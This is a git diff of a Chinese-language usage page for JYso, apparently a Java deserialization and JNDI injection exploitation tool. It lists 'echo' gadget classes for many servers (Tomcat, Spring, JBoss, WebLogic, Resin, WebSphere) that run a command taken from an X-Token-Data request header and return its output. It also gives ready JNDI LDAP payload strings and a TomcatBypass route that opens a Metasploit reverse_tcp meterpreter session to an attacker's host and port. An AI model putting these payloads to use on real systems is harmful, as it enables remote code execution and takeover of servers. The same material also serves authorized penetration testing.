Updated JYso‐CN (markdown)

炁
2024-03-14 16:39:22 +08:00
parent 0f8f7c275d
commit 19daf10653
+19 -14
@@ -144,26 +144,31 @@ ldap://127.0.0.1:1389/[Basic or TomcatBypass]/command/Base64/[base64_encoded_cmd
## 1.2 Echo使用
- 命令 `EX-AllEcho`:DFS 找 Request 命令执行回显
- 命令 `EX-TomcatEcho`:Tomcat 命令执行回显
- 命令 `EX-SpringEcho`:Spring 命令执行回显
- 命令 `EX-JbossEcho`:Jboss 命令执行回显
- 命令 `EX-jettyEcho`:Jetty 命令执行回显
- 命令 `EX-LinuxEcho1`:Linux 命令执行回显
- 命令 `EX-LinuxEcho2`:Linux 命令执行回显
- 命令 `EX-resinEcho`:Resin 命令执行回显
- 命令 `EX-weblogicEcho`:Weblogic 命令执行回显
- 命令 `EX-WindowsEcho`:Windows 命令执行回显
- 命令 `EX-ResinEcho`:Resin 命令执行回显
- 命令 `EX-WebsphereEcho`:websphere 命令执行回显
- 命令 `AllEcho`:DFS 找 Request 命令执行回显
- 命令 `TomcatEcho`:Tomcat 命令执行回显
- 命令 `SpringEcho`:Spring 命令执行回显
- 命令 `JbossEcho`:Jboss 命令执行回显
- 命令 `jettyEcho`:Jetty 命令执行回显
- 命令 `LinuxEcho1`:Linux 命令执行回显
- 命令 `LinuxEcho2`:Linux 命令执行回显
- 命令 `resinEcho`:Resin 命令执行回显
- 命令 `weblogicEcho`:Weblogic 命令执行回显
- 命令 `WindowsEcho`:Windows 命令执行回显
- 命令 `ResinEcho`:Resin 命令执行回显
- 命令 `WebsphereEcho`:websphere 命令执行回显
对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。
使用时在 Header 中加入 `X-Token-Data` ,其值为待执行的命令,命令执行结果将回显在 response 中。
+ JNDI-Injection-Exploit 用法:
+ 不需要参数时
```
jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass]
jndi:ldap://127.0.0.1:1389/TomcatBypass/E-TomcatEcho
```
+ 需要参数时
```
jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/-ch Cookiess
```
+ ysoserial
@@ -178,7 +183,7 @@ jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass]
- 支持tomcatBypass路由直接上线msf:
- 使用msf的java/meterpreter/reverse_tcp开启监听
```
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/E-Meterpreter/msf/[msf_ip]/[msf_port]
ldap://127.0.0.1:1389/TomcatBypass/E-Meterpreter/msf/[msf_ip]/[msf_port]
```
---